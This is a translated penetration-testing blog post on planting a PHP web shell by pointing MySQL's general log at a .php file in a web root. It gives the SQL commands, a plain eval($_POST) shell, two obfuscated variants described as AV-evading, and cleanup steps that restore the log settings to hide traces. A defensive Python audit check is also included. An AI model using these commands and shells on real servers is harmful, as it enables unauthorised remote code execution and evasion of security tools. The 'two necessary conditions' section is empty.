A brief analysis of the feasibility of using the MySQL general log to write a shell

Posted by millikan at 2020-04-12

0x01 Preface:

In real penetration tests we often run into this situation: we clearly hold MySQL root privileges, yet when we try to write a shell with INTO OUTFILE nothing we do will write it, even though we definitely have write permission on the target website directory and the MySQL root user has not been downgraded. Usually this is because INTO OUTFILE has been disabled or a WAF blocks it. I hope the method below helps.

0x02 Getting the shell:

The principle of using the MySQL log file to write a shell is very simple. Once the general log is enabled, every SQL statement executed is automatically recorded in the log file, so our shell code gets written there automatically as well. Operations staff normally use this to troubleshoot slow queries and only turn it on temporarily, so if we want to use it we have to turn it on ourselves, which is why root privileges are needed: it means changing MySQL's global configuration. The bit of MySQL common sense involved is shown plainly below:

First, check where MySQL's log currently goes by default; here it is 'C:\ProgramData\MySQL\MySQL Server 5.5\Data\2008R2DC.log':
mysql> show variables like '%general%';

mysql> set global general_log = on;

By default it is turned off, otherwise the volume of recorded insert, delete, update and select statements would be huge. Next, point the log file at a path under the web root:

mysql> set global general_log_file = 'C:/Program Files (x86)/Apache Software Foundation/Apache2.2/htdocs/abouts.php';

mysql> select '<?php eval($_POST[request]);?>';

Now write the shell. The one above is a plain shell; if there is a WAF, you can use the ones below instead:

mysql> select "<?php $sl = create_function('', @$_REQUEST['klion']);$sl();?>"; AV-evading shell, eval variant
mysql> SELECT "<?php $p = array('f'=>'a','pffff'=>'s','e'=>'fffff','lfaaaa'=>'r','nnnnn'=>'t');$a = array_keys($p);$_=$p['pffff'].$p['pffff'].$a[2];$_= 'a'.$_.'rt';$_(base64_decode($_REQUEST['klion']));?>"; someone else's AV-evading shell, assert & base64_encode variant

0x03 Cleaning up afterwards

mysql> set global general_log_file = 'C:/ProgramData/MySQL/MySQL Server 5.5/Data/2008R2DC.log'; -- use forward slashes: inside a MySQL string literal a backslash starts an escape sequence and would be dropped, mangling the path
mysql> set global general_log = off;
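As an added defensive example (not code from the original post), here is a Python check that flags the two settings this technique relies on, general_log ON and general_log_file pointing outside datadir or at a web-executable extension, both against a SHOW VARIABLES result and against SET GLOBAL statements captured by a query-audit source; the sample statements and paths are constructed from the values shown above.

```python
import re
from os.path import splitext
from posixpath import normpath

# Extensions a typical web server would execute if a MySQL log file landed in its document root.
WEB_EXEC_EXT = {".php", ".phtml", ".php5", ".jsp", ".asp", ".aspx"}
SET_LOG_FILE = re.compile(r"set\s+global\s+general_log_file\s*=\s*['\"]([^'\"]+)['\"]", re.I)

def _norm(path):
    """Normalise Windows or POSIX paths for comparison: forward slashes, no trailing slash, lower case."""
    return normpath(path.replace("\\", "/")).rstrip("/").lower()

def _inside(path, directory):
    """True when path lies below directory (after normalisation)."""
    return bool(directory) and _norm(path).startswith(_norm(directory) + "/")

def audit_variables(variables):
    """Findings for a dict of SHOW VARIABLES rows (general_log, general_log_file, datadir)."""
    findings = []
    log_file = variables.get("general_log_file", "")
    if variables.get("general_log", "OFF").upper() == "ON":
        findings.append("general_log is ON")
    if log_file and not _inside(log_file, variables.get("datadir", "")):
        findings.append("general_log_file outside datadir")
    if splitext(log_file.lower())[1] in WEB_EXEC_EXT:
        findings.append("general_log_file has a web-executable extension")
    return findings

def find_log_redirects(statements, datadir):
    """Target paths of SET GLOBAL general_log_file statements that point outside datadir."""
    hits = []
    for stmt in statements:
        m = SET_LOG_FILE.search(stmt)
        if m and not _inside(m.group(1), datadir):
            hits.append(m.group(1))
    return hits

# Constructed sample input (not real log data): statements as a query-audit source would capture them.
DATADIR = "C:\\ProgramData\\MySQL\\MySQL Server 5.5\\Data\\"
SAMPLE_STATEMENTS = [
    "show variables like '%general%'",
    "set global general_log = on",
    "set global general_log_file = 'C:/Program Files (x86)/Apache Software Foundation/Apache2.2/htdocs/abouts.php'",
    "select 1",
    "set global general_log_file = 'C:/ProgramData/MySQL/MySQL Server 5.5/Data/2008R2DC.log'",
]

if __name__ == "__main__":
    print(find_log_redirects(SAMPLE_STATEMENTS, DATADIR))
```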

0x04 Closing words

This is not a particularly novel trick; it is all about digging into and using some basic features of MySQL itself. Your own real understanding is what matters most. The exploitation process may not go smoothly, and recording how you worked through the problems is your real gain. Good luck.

0x05 Two necessary conditions for successful use


Welcome to follow my blog's official account or scan the code directly; it is centred on the personal WeChat public account "APT attack and defense guide", where posts will usually appear first and then be pushed to other platforms. I have always looked forward to learning and exchanging ideas with more like-minded friends.